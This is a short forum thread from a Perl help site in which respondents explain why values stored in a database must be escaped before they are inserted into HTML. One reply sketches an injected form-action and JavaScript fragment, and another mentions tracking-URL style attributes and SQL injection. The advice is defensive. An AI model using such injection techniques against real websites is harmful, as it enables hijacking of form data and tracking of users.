in reply to Re: Interpolation of variables in stored HTML
in thread Interpolation of variables in stored HTML

Thank you My Mother.

Are you talking about someone putting a malicious URL in the firstname field, for example?
Are you able to give me an example of a malicious URL which could do such damage, please?
I'm using placeholders for storing the CGI parms into the database.

Thanks again.

  • Comment on Re^2: Interpolation of variables in stored HTML

Replies are listed 'Best First'.
Re^3: Interpolation of variables in stored HTML
by Your Mother (Archbishop) on Nov 04, 2016 at 12:21 UTC

    Anonymous Monk is right. If a hacker can put anything at all into your webpage they can insert JavaScript, a tag with a style attribute that imports a tracking URL to monitor other users who view the info in the future, or this one if the data goes to the DB: Exploits of a Mom.

[reply]
Re^3: Interpolation of variables in stored HTML
by Anonymous Monk on Nov 04, 2016 at 08:51 UTC

    If you don't escape/encode/filter the values you get from database, then the resulting html can be anything, it can be <form action=http... .... javascript ... so submit doesn't post the data you want, to the url you want .... whos writing the page, the author/programmer or internet stranger?

    Also no ReadParse no CGI->Vars they corrupt data

[reply]
[d/l]

In Section Seekers of Perl Wisdom